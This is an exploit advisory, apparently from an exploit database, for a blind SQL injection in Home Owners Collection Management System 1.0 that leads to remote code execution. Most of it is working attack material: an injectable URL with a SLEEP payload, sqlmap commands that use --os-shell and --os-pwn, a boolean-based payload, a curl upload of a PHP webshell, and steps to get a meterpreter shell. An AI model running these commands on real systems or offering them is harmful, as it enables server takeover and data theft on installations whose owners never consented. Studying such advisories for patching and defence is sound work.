Home Owners Collection Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for remote code execution.
ee57cf3d919ca1169d4199c321c21f88
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (Blind SQLi to RCE)
# Date: 9/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows
# Steps
# 1.- Go to : http://192.168.56.1/cwms/?p=blogs/view_blog&id=3
# 2 - manual inject Blind SQli http://192.168.56.1/cwms/?p=blogs/view_blog&id=3%27&&SLEEP(5)&&%271
# 3 - SQLi To RCE r00t
# 4 - Ubload webshell
# 5 - Web Shell to meterpreter full tty shell
# Blind sqli to Rce
#Exploit
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-shell --eta --hex --dbms=mysql --technique=b
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hOiz
---
# ubload meterpreter metasploit
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-pwn --eta --hex --dbms=mysql --technique=b
or
curl -v -F "filename=@0day_hejap.php" http://192.168.56.1/tmpukpcj.php
# Proof and Exploit:
https://streamable.com/f07cug